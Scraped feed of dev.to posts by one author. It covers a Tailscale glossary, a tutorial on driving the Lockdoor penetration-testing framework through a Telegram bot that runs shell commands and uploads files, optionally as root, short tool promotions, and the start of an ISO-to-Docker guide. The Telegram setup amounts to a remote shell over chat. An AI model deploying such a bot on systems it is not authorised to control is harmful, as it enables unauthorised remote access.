&lt;p&gt;A firewall limits what network traffic can pass between two points. Firewalls can be hardware-based or software-based. Tailscale includes a built-in firewall, defined by the domain’s access rules.&lt;/p&gt;

&lt;h3&gt;
  
  
  Identity Provider
&lt;/h3&gt;

&lt;p&gt;An identity provider is a method for users to authenticate to a tailnet. Examples of identity providers include Google, Okta, and Microsoft. Tailscale is not an identity provider but relies other identity providers for authentication.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key expiry
&lt;/h3&gt;

&lt;p&gt;Key expiry is the end of the validity period for a cryptographic key. An expired key can no longer encrypt or decrypt data, nor authenticate a device to a Tailscale network.&lt;/p&gt;

&lt;p&gt;Using Tailscale means you never have to manage encryption keys directly. Tailscale automatically expires keys and requires them to be regenerated at regular intervals. You can disable key expiry for long-lived devices from the admin console.&lt;/p&gt;

&lt;h3&gt;
  
  
  MagicDNS
&lt;/h3&gt;

&lt;p&gt;MagicDNS automatically registers memorable hostnames for devices in your Tailscale network. It also extends and improves DNS functionality.&lt;/p&gt;

&lt;h3&gt;
  
  
  NAT traversal
&lt;/h3&gt;

&lt;p&gt;NAT is an acronym for network address translation. NAT traversal is a way to connect nodes across the internet through barriers such as firewalls. Most internet devices can’t talk to each other because of firewalls and devices that do network address translation. NAT traversal works around these barriers, allowing data to traverse the network.&lt;/p&gt;

&lt;h3&gt;
  
  
  Network topology
&lt;/h3&gt;

&lt;p&gt;A network topology is an arrangement of nodes in a network. It shows the connections between them. Examples of network topologies include star, bus, hub-and-spoke, mesh, and hybrid.&lt;/p&gt;

&lt;p&gt;Traditional virtual private networks (VPNs) use a hub-and-spoke topology. Each machine communicates with another in this setup by sending all traffic through a central gateway machine. Tailscale operates as a mesh topology where each machine can talk directly to others using NAT traversal.&lt;/p&gt;

&lt;h3&gt;
  
  
  Node
&lt;/h3&gt;

&lt;p&gt;A node is a combination of a user and a device.&lt;/p&gt;

&lt;h3&gt;
  
  
  Peer
&lt;/h3&gt;

&lt;p&gt;A peer is another node that your node is trying to talk to. A peer might or might not be in the same domain.&lt;/p&gt;

&lt;h3&gt;
  
  
  Relay
&lt;/h3&gt;

&lt;p&gt;A relay is an intermediary server that passes data between two or more nodes in a network. Tailscale uses a special type of globally distributed relay server called Designated Encrypted Relay for Packets (DERP). DERP relay servers function as a fallback to connect nodes when NAT traversal fails.&lt;/p&gt;

&lt;h3&gt;
  
  
  SSO
&lt;/h3&gt;

&lt;p&gt;SSO is an acronym for single sign-on. Single sign-on lets users log in to one site using the identity of another.&lt;/p&gt;

&lt;h3&gt;
  
  
  Tailnet
&lt;/h3&gt;

&lt;p&gt;A tailnet is another term for a Tailscale network, which is an interconnected collection of users, machines, and resources. The network has a control plane and a data plane that work in unison to manage access and send data between nodes.&lt;/p&gt;

&lt;p&gt;There are personal and organization tailnets. A personal tailnet is a shared domain single-user tailnet (like gmail.com). An organization tailnet is a custom domain tailnet (like example.com),&lt;/p&gt;

&lt;h3&gt;
  
  
  Tailnet policy file
&lt;/h3&gt;

&lt;p&gt;The tailnet policy file stores your Tailscale network’s access rules, along with other tailnet configuration items. It uses human JSON (HuJSON) and conforms to the Tailscale policy syntax.&lt;/p&gt;

&lt;h3&gt;
  
  
  Tailscale IP address
&lt;/h3&gt;

&lt;p&gt;A Tailscale IP address is a unique IP address assigned to each machine in your Tailscale network. It’s always in the form 100.x.y.z (for example, 100.101.102.103). It stays the same even when switching between your home internet connection, cellular networks, or coffee shop Wi-Fi networks.&lt;/p&gt;

&lt;h3&gt;
  
  
  Tunnel
&lt;/h3&gt;

&lt;p&gt;In networking, a tunnel is an encapsulated connection between one or more points in a network. It lets users, nodes, or resources communicate securely over a public data network.&lt;/p&gt;

&lt;h3&gt;
  
  
  WireGuard
&lt;/h3&gt;

&lt;p&gt;WireGuard is the underlying cryptographic protocol that Tailscale uses.&lt;/p&gt;

&lt;p&gt;Without forgetting modern design of the clients available on &lt;strong&gt;MacOS&lt;/strong&gt; , &lt;strong&gt;Linux&lt;/strong&gt; , &lt;strong&gt;IOS&lt;/strong&gt; , &lt;strong&gt;Android&lt;/strong&gt; &amp;amp;  &lt;strong&gt;Windows&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8tc8y1lovt95paixruv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8tc8y1lovt95paixruv.png" width="800" height="1180"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://twitter.com/S0fianeHamlaoui" rel="noopener noreferrer"&gt;x.com&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;© 2024 — Sofiane Hamlaooui — Making the world a better place 🌎&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>sofianehamlaoui</category>
      <category>security</category>
      <category>vpn</category>
    </item>
    <item>
      <title>Use Telegram bot as a Penetration Testing Framework</title>
      <dc:creator>Sofiane Hamlaoui</dc:creator>
      <pubDate>Sun, 15 Dec 2019 05:20:56 +0000</pubDate>
      <link>https://dev.to/sofianehamlaoui/use-telegram-bot-as-a-penetration-testing-framework-5aaf</link>
      <guid>https://dev.to/sofianehamlaoui/use-telegram-bot-as-a-penetration-testing-framework-5aaf</guid>
      <description>&lt;h3&gt;
  
  
  ✈️Use Telegram bot as a Penetration Testing Framework
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;em&gt;The idea ? :&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;em&gt;So I was checking out my browser bookmarks, then I noticed having a medium article about&lt;/em&gt; &lt;a href="https://medium.com/@arbazhussain/telegram-bot-for-hacking-pentesting-b7856db28ef"&gt;&lt;strong&gt;Telegram bot for Hacking &amp;amp; Pentesting&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;.&lt;/strong&gt; &lt;em&gt;I checked the article and shared it on my&lt;/em&gt; &lt;a href="https://twitter.com/S0fianeHamlaoui/status/1205414073837457408"&gt;&lt;strong&gt;Twitter account,&lt;/strong&gt;&lt;/a&gt; &lt;em&gt;than I’ve seen that some CyberSec (or Interested by ) loved the bot idea.&lt;br&gt;&lt;br&gt;
I made a&lt;/em&gt; &lt;a href="https://github.com/SofianeHamlaoui/Lockdoor-Framework"&gt;&lt;strong&gt;&lt;em&gt;Penetration Testing Framework called Lockdoor&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt;&lt;em&gt;, So why not making the same thing with my tool ?&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Updates :&lt;/strong&gt; &lt;a href="https://medium.com/u/c66be62f5b6b"&gt;&lt;strong&gt;Arbaz Hussain&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;’s tool isn’t working now ( 12/15/2019 )&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Check it here : &lt;a href="https://github.com/arbazkiraak/hackbot"&gt;https://github.com/arbazkiraak/hackbot&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;em&gt;How does that work ?&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;em&gt;So the idea is by running&lt;/em&gt; &lt;a href="https://github.com/SofianeHamlaoui/Lockdoor-Framework"&gt;&lt;strong&gt;&lt;em&gt;Lockdoor Framework&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt; &lt;em&gt;from any&lt;/em&gt; &lt;a href="https://telegram.org/"&gt;&lt;strong&gt;&lt;em&gt;Telegram&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt; &lt;em&gt;chat/messenger.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Basically, it’s about running ( commands ) to run the tool from any Telegram chat, Of course before doing that you have first to configure &amp;amp; install the tool first, than configuring the bot and using it.&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;em&gt;Cool, Let’s do that !&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;1 — Configuring&lt;/em&gt;&lt;/strong&gt;  &lt;strong&gt;&lt;em&gt;&amp;amp; Installing Lockdoor Framework :&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;To do that, you can check the installation wiki of the tool :&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/SofianeHamlaoui/Lockdoor-Framework/wiki/Installation"&gt;SofianeHamlaoui/Lockdoor-Framework&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Or :
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$: git clone [https://github.com/SofianeHamlaoui/Lockdoor-Framework.git](https://github.com/SofianeHamlaoui/Lockdoor-Framework.git) &amp;amp;&amp;amp; cd Lockdoor-Framework 
$: chmod +x ./install.sh 
$: ./install.sh
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;&lt;em&gt;2 — Configuring &amp;amp; Installing the Telegram bot&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;For that I used A modified version of&lt;/em&gt; &lt;a href="https://github.com/botgram/shell-bot"&gt;&lt;strong&gt;&lt;em&gt;shell bot,&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt; &lt;em&gt;made by&lt;/em&gt; &lt;strong&gt;_ _&lt;/strong&gt; &lt;a href="https://github.com/botgram"&gt;&lt;strong&gt;&lt;em&gt;botgram&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;&lt;em&gt;.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;em&gt;Configuring the bot&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://github.com/SofianeHamlaoui/lockdoor-bot"&gt;https://github.com/SofianeHamlaoui/lockdoor-bot&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--53QgZ6YC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/590/1%2A8TyElmoZCOT4mNKfIVJ9Ig.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--53QgZ6YC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/590/1%2A8TyElmoZCOT4mNKfIVJ9Ig.png" alt=""&gt;&lt;/a&gt;Starting a conversation with botfather&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to &lt;a href="https://web.telegram.org/"&gt;&lt;strong&gt;&lt;em&gt;https://web.telegram.org/&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Start a conversation with our father&lt;/em&gt; &lt;a href="https://web.telegram.org/#/im?p=@BotFather"&gt;&lt;strong&gt;&lt;em&gt;botfather&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Ma0a_c3E--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/559/1%2AXKXvXtxHrpoLiInVWaGyYg.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Ma0a_c3E--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/559/1%2AXKXvXtxHrpoLiInVWaGyYg.jpeg" alt=""&gt;&lt;/a&gt;Creating the Telegram bot&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;type &lt;strong&gt;&lt;em&gt;/newbot&lt;/em&gt;&lt;/strong&gt; &lt;em&gt;to create a new bot&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;&lt;em&gt;give it a Name. ( A name for your Telegram Bot )&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;give it a Username. ( A username for your Telegram bot&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;em&gt;Copy and Save the API&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;em&gt;Configuring &amp;amp; Running the bot server&lt;/em&gt;&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Requirements : 
- python
- [node-pty](https://github.com/Microsoft/node-pty#dependencies)
- Telegram 
- Happiness :D
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;em&gt;* Installing&lt;/em&gt;&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$: git clone [https://github.com/SofianeHamlaoui/Lockdoor-bot](https://github.com/SofianeHamlaoui/lockdoor-bot) &amp;amp;&amp;amp; cd Lockdoor-bot
$: npm install
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;em&gt;*Starting the server :&lt;/em&gt;&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$: node server
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;&lt;em&gt;The first time you run it, it will ask you some questions and create the configuration file automatically:&lt;/em&gt; &lt;em&gt;config.json. You can also write it manually, see&lt;/em&gt; &lt;em&gt;config.example.json&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--whV6_mUv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1016/1%2ACsWiiAsjdKTSRz_EWHUakA.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--whV6_mUv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1016/1%2ACsWiiAsjdKTSRz_EWHUakA.jpeg" alt=""&gt;&lt;/a&gt;Configuring the server&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Using the API token you copied after creating the Telegram bot&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Use the link given by the bot (&lt;/em&gt; &lt;a href="https://t.me/XXXXXXXX"&gt;&lt;em&gt;https://t.me&lt;/em&gt;&lt;/a&gt;&lt;em&gt;/X/X/X/X/X/X/X/X/X/ ) and send a message to make your Telegram profile as bot’s owner )&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;em&gt;*Running the server :&lt;/em&gt;&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$: node server
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--z6wvM2lw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/352/1%2AT0Y0jDVKq4FFWJ4QrwXnTA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--z6wvM2lw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/352/1%2AT0Y0jDVKq4FFWJ4QrwXnTA.png" alt=""&gt;&lt;/a&gt;The bot is ready&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;CONGRATULATIONS ! Your Bot is ready ❤&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;The commands :&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;em&gt;You have lot of commands to use with this bot here is the list of the commands ( or you can check them from&lt;/em&gt;&lt;a href="https://github.com/SofianeHamlaoui/lockdoor-bot"&gt;&lt;em&gt;github’s repo&lt;/em&gt;&lt;/a&gt;_ )_&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;run - Execute command
enter - Send input lines to command
type - Type keys into command
control - Type Control+Letter
meta - Send the next typed key with Alt
keypad - Toggle keypad for special keys
redraw - Force the command to repaint
end - Send EOF to command
cancel - Interrupt command
kill - Send signal to process
status - View status and current settings
cd - Change directory
env - Manipulate the environment
shell - Change shell used to run commands
resize - Change the terminal size
setsilent - Enable / disable silent output
setlinkpreviews - Enable / disable link expansion
setinteractive - Enable / disable shell interactive flag
help - Get help
file - View and edit small text files
upload - Upload and overwrite raw files
r - Alias for /run or /enter
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;The important commands :&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/run - to run a command
/enter - to Send input lines to command
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;



&lt;p&gt;&lt;em&gt;After Configuring and running the server, Now it’s time to Use&lt;/em&gt; &lt;a href="https://github.com/SofianeHamlaoui/Lockdoor-Framework"&gt;&lt;em&gt;Lockdoor-Framework&lt;/em&gt;&lt;/a&gt; &lt;em&gt;From any Telegram Chat/Messenger.&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Now ! You have 2 choices ! As Lockdoor Framework requires the Root Permissions, You can :&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;1 &amp;gt; Run the bot server as root, ( Not really recommended)&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$: sudo node server
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;2 &amp;gt; Run lockdoor as root from the telegram chat&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight"&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$: ( Telegram chat ) : / **run sudo lockdoor**
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;Go to your telegram bot chat and type /&lt;/em&gt; &lt;strong&gt;&lt;em&gt;run lockdoor&lt;/em&gt;&lt;/strong&gt; &lt;em&gt;( or /&lt;/em&gt; &lt;strong&gt;&lt;em&gt;run sudo lockdoor&lt;/em&gt;&lt;/strong&gt; &lt;em&gt;if you didn’t start the bot server as root )&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;CONGRATULATIONS ! You’re running a Penetration Testing Framework from a Telegram chat ❤&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;em&gt;Screenshots :&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;From Desktop/Web chat :&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hSHw3oFw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1024/1%2ABTzcc7Np2Iyg01x66AXZeA.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hSHw3oFw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1024/1%2ABTzcc7Np2Iyg01x66AXZeA.jpeg" alt=""&gt;&lt;/a&gt;Screenshots from the Desktop/Web chat&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;From phone :&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--WS7qH5vn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1024/1%2AaVTkY5CerhOMrrLzfN1W-w.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--WS7qH5vn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1024/1%2AaVTkY5CerhOMrrLzfN1W-w.jpeg" alt=""&gt;&lt;/a&gt;Lockdoor Framework on phone&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;em&gt;What’s next ? :&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;More : Check Lockdoor Framework Github repo with to know more about the tool and how it works ❤&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;My Github profile :&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://github.com/SofianeHamlaoui/Lockdoor-Framework"&gt;SofianeHamlaoui/Lockdoor-Framework&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;My Twitter account :&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://twitter.com/S0fianeHamlaoui"&gt;Sofiane Hamlaoui&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;My Website :&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://sofianehamlaoui.me"&gt;Sofiane HAMLAOUI on about.me&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;My Facebook profile&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://www.facebook.com/S0fianeHamlaoui"&gt;Facebook&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Thanks !&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;Thanks to &lt;a href="https://medium.com/u/c66be62f5b6b"&gt;Arbaz Hussain&lt;/a&gt; for his article that gave me this idea.&lt;br&gt;&lt;br&gt;
Thanks to &lt;a href="https://medium.com/u/3c8c96bf9b55"&gt;Alba Mendez&lt;/a&gt; for her bot-shell that helped me making the lockdoor Telegram bot.&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>sofianehamlaoui</category>
      <category>telegram</category>
      <category>cybersecurity</category>
      <category>penetrationtesting</category>
    </item>
    <item>
      <title>Go-UnderCover : Simple tool to install/use Kali-Undercover on all Linux distros</title>
      <dc:creator>Sofiane Hamlaoui</dc:creator>
      <pubDate>Tue, 10 Dec 2019 09:11:04 +0000</pubDate>
      <link>https://dev.to/sofianehamlaoui/go-undercover-simple-tool-to-install-use-kali-undercover-on-all-linux-distros-42nn</link>
      <guid>https://dev.to/sofianehamlaoui/go-undercover-simple-tool-to-install-use-kali-undercover-on-all-linux-distros-42nn</guid>
      <description>&lt;p&gt;Everyone was happy with this new "Kali Undercover mode" on the new Kali Linux 2019.4 release. &lt;br&gt;
So the idea is : Why only Kali Linux, let's do it for all Linux distros! &lt;br&gt;
Here comes Go-UnderCover ❤. &lt;br&gt;
Same code,Same role, but not for one only distro.&lt;/p&gt;

&lt;p&gt;• The Github repo : GUC : Go Under Cover&lt;br&gt;
&lt;a href="https://github.com/SofianeHamlaoui/Go-undercover" rel="noopener noreferrer"&gt;https://github.com/SofianeHamlaoui/Go-undercover&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kalilinux</category>
      <category>hacking</category>
      <category>sofianehamlaoui</category>
    </item>
    <item>
      <title>The Best Pack Of Tools For Cyber Security Students | Lockdoor Framework</title>
      <dc:creator>Sofiane Hamlaoui</dc:creator>
      <pubDate>Sun, 01 Dec 2019 04:49:44 +0000</pubDate>
      <link>https://dev.to/sofianehamlaoui/the-best-pack-of-tools-for-cyber-security-students-lockdoor-framework-4ge2</link>
      <guid>https://dev.to/sofianehamlaoui/the-best-pack-of-tools-for-cyber-security-students-lockdoor-framework-4ge2</guid>
      <description>&lt;p&gt;Lockdoor is a Framework aimed at helping penetration testers, bug bounty hunters And cyber security engineers. This tool is designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. But containing the favorite and the most used tools by Pentesters. As pentesters, most of us has his personal ' /pentest/ ' directory so this Framework is helping you to build a perfect one.&lt;/p&gt;

&lt;p&gt;We all know that there a lot of frameworks and similar tools like lockdoor, So what made lockdoor different, was Adding The Favorite and most used tools by pentesters, Automating the Pentesting process to help you do the job more quickly and the best part ! CHEATSHEETS &amp;amp; RESOURCES! So yes, that's why we made a quick video about lockdoor.&lt;/p&gt;

&lt;p&gt;◉ Repo: &lt;a href="https://github.com/SofianeHamlaoui/Lockdoor-Framework" rel="noopener noreferrer"&gt;https://github.com/SofianeHamlaoui/Lockdoor-Framework&lt;/a&gt; &lt;/p&gt;

&lt;p&gt;◉ The tool developer’s Twitter account : &lt;a href="https://twitter.com/S0fianeHamlaoui" rel="noopener noreferrer"&gt;https://twitter.com/S0fianeHamlaoui&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;◉ Kitploit post about the tool : &lt;a href="https://www.kitploit.com/2019/10/lockdoor-framework-penetration-testing.html" rel="noopener noreferrer"&gt;https://www.kitploit.com/2019/10/lockdoor-framework-penetration-testing.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;◉ The Shadow Brokers video : &lt;br&gt;
&lt;a href="https://youtu.be/6njKRrKQtow" rel="noopener noreferrer"&gt;https://youtu.be/6njKRrKQtow&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With a lot of articles and awesome people sharing it everywhere with anyone. &lt;/p&gt;

</description>
      <category>security</category>
      <category>sofianehamlaoui</category>
      <category>cybersecurity</category>
      <category>redteaming</category>
    </item>
    <item>
      <title>Convert ISO images to docker images</title>
      <dc:creator>Sofiane Hamlaoui</dc:creator>
      <pubDate>Tue, 17 Sep 2019 18:16:03 +0000</pubDate>
      <link>https://dev.to/sofianehamlaoui/convert-iso-images-to-docker-images-18jh</link>
      <guid>https://dev.to/sofianehamlaoui/convert-iso-images-to-docker-images-18jh</guid>
      <description>&lt;h3&gt;
  
  
  🐳 Convert ISO images to docker images
&lt;/h3&gt;

&lt;p&gt;Yep! I was looking for a method or a trick to convert ISO files to docker images, It was hard to find one ! But the only one was not really explained and lacking some information. So here we are !!&lt;/p&gt;

&lt;h3&gt;
  
  
  Choosing the ISO file :
&lt;/h3&gt;

&lt;p&gt;Well before starting the process ! Keep in mind that you have to use a &lt;a href="https://en.wikipedia.org/wiki/Live_CD" rel="noopener noreferrer"&gt;&lt;strong&gt;&lt;em&gt;live disc&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;&lt;em&gt;,&lt;/em&gt;&lt;/strong&gt; means a bootable version of the operating system.&lt;/p&gt;

&lt;h3&gt;
  
  
  Before Starting ! :
&lt;/h3&gt;

&lt;p&gt;In this tutorial/story, I’ll use Ubuntu 18.04.3 &lt;a href="https://en.wikipedia.org/wiki/Long-term_support" rel="noopener noreferrer"&gt;LTS&lt;/a&gt;’s live disc ISO,&lt;/p&gt;

&lt;h3&gt;
  
  
  Keywords :
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;em&gt;rootfs&lt;/em&gt;&lt;/strong&gt;  : a &lt;a href="https://en.wikipedia.org/wiki/File_system" rel="noopener noreferrer"&gt;file system&lt;/a&gt;. In &lt;a href="https://en.wikipedia.org/wiki/Linux" rel="noopener noreferrer"&gt;Linux&lt;/a&gt;, all file systems have a mount point, which is the directory where the mounted file system connects to the root file system&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;em&gt;squashfs :&lt;/em&gt;&lt;/strong&gt; a &lt;a href="https://en.wikipedia.org/wiki/Data_compression" rel="noopener noreferrer"&gt;compressed&lt;/a&gt; read-only &lt;a href="https://en.wikipedia.org/wiki/File_system" rel="noopener noreferrer"&gt;file system&lt;/a&gt; for &lt;a href="https://en.wikipedia.org/wiki/Linux" rel="noopener noreferrer"&gt;Linux&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
